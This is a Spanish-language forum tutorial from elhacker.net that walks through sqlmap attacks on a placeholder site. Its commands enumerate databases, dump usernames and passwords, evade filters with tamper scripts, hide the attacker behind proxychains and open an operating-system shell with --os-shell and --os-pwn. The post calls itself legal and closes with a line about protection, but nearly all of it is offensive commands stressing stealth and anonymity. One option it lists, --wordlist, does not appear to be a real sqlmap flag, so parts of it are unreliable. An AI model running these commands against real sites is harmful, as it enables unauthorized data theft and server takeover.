Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: blckkey en 8 Enero 2025, 10:35 am



Título: [TUTORIAL] Cómo romper aplicaciones web con SQLmap (legalmente)
Publicado por: blckkey en 8 Enero 2025, 10:35 am
Este tutorial es para los que creen que probar SQL Injection es escribir comillas en un campo de texto. Aquí vamos a llevar SQLmap al siguiente nivel. Rápido, directo y sin rodeos.



Preparación del entorno

Primero, asegúrate de tener SQLmap instalado. Si usas Linux:
Código:
sudo apt update && sudo apt install sqlmap

Para Windows, descárgalo desde su página oficial.

(Usa una máquina virtual o VPN para mantenerte seguro mientras experimentas.)


Primer escaneo: Básico pero funcional

Para probar rápidamente si un sitio es vulnerable:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --dbs

-u: La URL objetivo.
--dbs: Enumera las bases de datos disponibles si encuentra vulnerabilidades.



Extracción de información (Bases de datos, tablas y columnas)

Obtener bases de datos:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --dbs

Elegir una base de datos y sacar tablas:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb --tables

Ver columnas de una tabla:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb -T users --columns

Sacar datos (usuarios y contraseñas):
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb -T users -C username,password --dump



Saltarse restricciones (Bypass)

Usar técnicas de evasión:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --tamper=space2comment

Con ProxyChains para anonimato:
Código:
proxychains sqlmap -u "http://target.com/vuln.php?id=1" --dbs

Dividir peticiones para confundir el análisis de tráfico:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --level=5 --risk=3



Automatizar fuerza bruta

Si quieres probar contraseñas rápidamente:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --passwords

Prueba diccionarios personalizados:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --wordlist=users.txt



Subir shells (para auditorías internas)

Subir un shell interactivo directamente:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --os-shell

Acceder al sistema operativo si el servidor es vulnerable:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --os-pwn



SQLmap no es solo para encontrar vulnerabilidades; es para entender cómo funcionan las aplicaciones y cómo protegerlas. Si algo no debería estar expuesto, avisa antes de explotarlo.